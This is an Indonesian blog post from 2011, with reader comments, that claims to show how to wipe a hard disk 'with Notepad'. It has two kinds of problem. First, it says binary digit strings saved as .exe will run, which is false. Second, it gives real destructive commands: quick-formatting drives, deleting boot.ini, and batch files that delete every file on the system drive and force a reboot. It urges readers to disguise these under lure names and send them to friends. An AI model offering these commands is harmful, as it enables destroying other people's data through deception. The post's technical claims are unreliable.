Cara Memformat Hard disk Menggunakan Notepad

Recommended:
Mau tau cara memformat harddisk menggunakan notepad? yang penting Jangan dicoba di PC Anda, hanya untuk pengetahuan saja yah, sekalian nambah ilmu. , yuk mulai:

Langkah Pertama:

Copy kode binary berikut ke notepad, sebelumnya buka dulu program notepad yah, kl ga tau cara buka notepad klik Start–>All Programs–>accessories klik Notepad.

01001011000111110010010101010101010000011111100000

Langkah Kedua:

Simpanlah dengan ekstensi file .EXE mau nama apa terserah anda. atau coba simpan dengan nama cewe_bugil.exe :p

Langkah Ketiga: kirim buat teman atau orang yg mau dikerjain .

Jika anda fikir kita tidak dapat memformat harddisk dalam kondisi windows sedang aktiv? coba terka…, kalo ngga coba test dengan harddisk yang lain, coba kode simpel binary berikut:

format c:\ /Q/X — ini akan memformat drive c:\

Kode:



01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — ini akan memformat drive d:\

Kode:



01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — ini akan memformat drive a:\

Kode:



01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — ini akan menyebabkan komputer tidak akan booting.

Kode:



01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

Coba fikir lebih kreatif? atau mau yang lebih keren lagi coba ini:

Buka notepad dan masukin:



@Echo off

Del C:\ *.*|y

Simpan dengan nama Gue.bat

atau mau yang lebih menyeramkan?



@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

Simpan dengan nama apa.bat atau apa saja sesuai dengan kesukaan. , kirim buat teman yah.



 By : Nizar Suryaman
Mas Kholiq
Judul : Cara Memformat Hard disk Menggunakan Notepad
Url : http://tulisan-menarik.blogspot.com/2011/05/memformat-harddisk-menggunakan-notepad.html
Rating: 100% based on 99998 ratings. 5 user reviews.
Ditulis Oleh Mas Kholiq
Bagikan ke teman :

6 comments Untuk Cara Memformat Hard disk Menggunakan Notepad

  1. loh bisa juga diformat pake notepad
    baru tahu aku mas hehe

    ReplyDelete
  2. buat pengetahuan saja, okelah. lagian kalo disuruh juga gak bakalan kucoba. hehe

    ReplyDelete
  3. aku ikuti langkahnya perlahan

    ReplyDelete
  4. Baru tahu saya bro klo format Hard Disk bisa pake notepad. Baca postingan ini jadi ngeri campur penasaran neh :D .... Kalau di Warnet bisa ga bro, kalau bisa, jangan disebarin geh, kasihan tuh temen-temen yang punya warnet, bisa hancur ded bisnisnya :D ...

    ReplyDelete
  5. jiahahahaha mantap....
    perintah DOS yg dijalankan lsg maknyuuuusss

    ReplyDelete

Bukan Tulisan Biasa!

Jangan dibaca!

 
Copyright © 2013. Blog Mas Kholiq | Tulisan Menarik™ - All Rights Reserved
Powered by Blogger